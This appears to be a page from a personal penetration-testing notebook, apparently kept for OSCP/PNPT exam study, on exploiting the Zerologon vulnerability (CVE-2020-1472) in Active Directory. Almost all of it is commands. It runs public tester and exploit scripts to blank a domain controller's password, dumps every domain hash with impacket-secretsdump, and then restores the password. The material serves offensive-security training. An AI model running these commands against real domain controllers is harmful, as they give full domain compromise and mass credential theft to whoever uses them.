⌘Ctrlk

kashz jewels
about kashz
oscp exam review
pnpt exam review
certification exam
c2 frameworks
kashz-kali
- shells
- windows shells
- osint

Powered by GitBook

For the complete documentation index, see llms.txt. This page is also available as Markdown.

ACTIVE-DIRECTORY

zero logon exploit

Information

This exploit changes the DC Password to an empty string.

SecuraBV/CVE-2020-1472/zerologon_tester.py
python3 zerologon_tester.py DOMAIN DC_IP

Exploit

Clone dirkjanm/CVE-2020-1472
python3 exploit.py DOMAIN DC_IP

Dump hashes

impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP - no-pass

Restore

impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP
Note the plaintext password plain_password_hex
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX

Previousresponder Nextuntested tools

Last updated 4 years ago

Information
Exploit
Dump hashes
Restore